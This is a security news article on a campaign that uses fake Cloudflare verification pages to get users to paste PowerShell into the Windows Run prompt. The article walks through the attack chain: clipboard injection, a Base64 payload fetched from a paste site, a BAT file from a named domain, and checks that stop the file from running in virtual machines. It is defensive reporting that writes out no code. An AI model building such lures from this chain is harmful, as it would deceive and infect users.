Hackers use Fake Cloudflare Verification Screen to Trick Users into Executing Malware

A sophisticated social engineering campaign has emerged targeting unsuspecting users through fraudulent Cloudflare verification screens, representing a new evolution in malware distribution tactics.

This attack method leverages the trusted appearance of legitimate web security services to deceive victims into executing malicious code on their systems, exploiting inherent trust in established security providers.

The malware campaign employs a multi-stage attack vector that begins with a convincing fake CAPTCHA verification page designed to mimic Cloudflare’s authentic security checks.

When users encounter this deceptive interface, they are prompted to complete what appears to be a routine verification process, unknowingly initiating a complex malware installation sequence.

Security researchers, including Shaquib Izhar analysts, have identified this campaign as particularly dangerous due to its sophisticated social engineering approach and advanced evasion techniques.

The attack demonstrates how cybercriminals are increasingly exploiting users’ familiarity with legitimate security mechanisms to bypass traditional security awareness training and infiltrate networks.

Upon clicking the “Verify” button, the malicious webpage injects PowerShell code directly into the user’s clipboard while simultaneously capturing their IP address for reconnaissance purposes.

The system then prompts victims to perform an additional verification step, creating a false sense of legitimacy while secretly monitoring their actions through keystroke tracking capabilities.

Advanced Infection Mechanism and Payload Delivery

The attack’s infection mechanism reveals sophisticated technical implementation designed to evade detection systems and maintain operational security.

When users access the Windows Run prompt, the malicious webpage establishes communication with the attacker’s command and control infrastructure through embedded webhooks, sending real-time notifications about the victim’s actions.

The pasted PowerShell command retrieves a Base64-encoded payload from pastesio[.]com, which then downloads and executes a hardcoded BAT file from axiomsniper[.]info.

This BAT file incorporates anti-analysis features, specifically checking for virtual machine environments and terminating execution if detected, thereby avoiding automated security analysis systems and sandbox environments.

Currently, the BAT file maintains zero detection across VirusTotal scanners, highlighting the campaign’s effectiveness in evading traditional signature-based detection methods and emphasizing the critical need for behavioral analysis approaches in modern cybersecurity defense strategies.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now